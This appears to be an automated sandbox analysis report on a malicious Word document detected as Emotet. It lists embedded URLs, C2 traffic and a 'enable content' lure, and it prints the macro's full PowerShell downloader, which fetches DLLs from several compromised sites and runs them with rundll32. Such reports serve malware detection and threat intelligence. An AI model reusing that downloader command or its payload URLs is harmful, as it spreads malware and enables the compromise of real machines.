Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://directory.services.
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pesterp
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.312830879.000000000517B000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.local
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://osi.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://roaming.edog.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000002.309792794.000001C41943A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://tasks.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/

Source: unknown

DNS traffic detected: queries for: thepilatesstudionj.com

Source: global traffic	HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Nov 2021 10:03:15 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A5A30 GetOpenClipboardWindow,CloseClipboard,GetMenuCheckMarkDimensions,IsSystemResumeAutomatic,

14_2_615A5A30

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type h
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for protected documents You have to press "ENABLE
Source: Screenshot number: 4	Screenshot OCR: protected documents You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms D
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese butt
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. C, Previewing is not available for protected documents. O You have to press
Source: Screenshot number: 8	Screenshot OCR: protected documents. O You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview t
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese buttons to quickly custo
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)			Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document has an unknown application name

Source: 1711.doc	OLE indicator application name: unknown
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator application name: unknown
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator application name: unknown

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046EE760	5_2_046EE760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF60	5_2_046ECF60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF70	5_2_046ECF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5730	14_2_615A5730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA1F0	14_2_615BA1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D3074	14_2_615D3074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA29D	14_2_615BA29D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615AF700	14_2_615AF700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C3780	14_2_615C3780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA60F	14_2_615BA60F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615CC6FE	14_2_615CC6FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D1929	14_2_615D1929
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA8B9	14_2_615BA8B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAB80	14_2_615BAB80
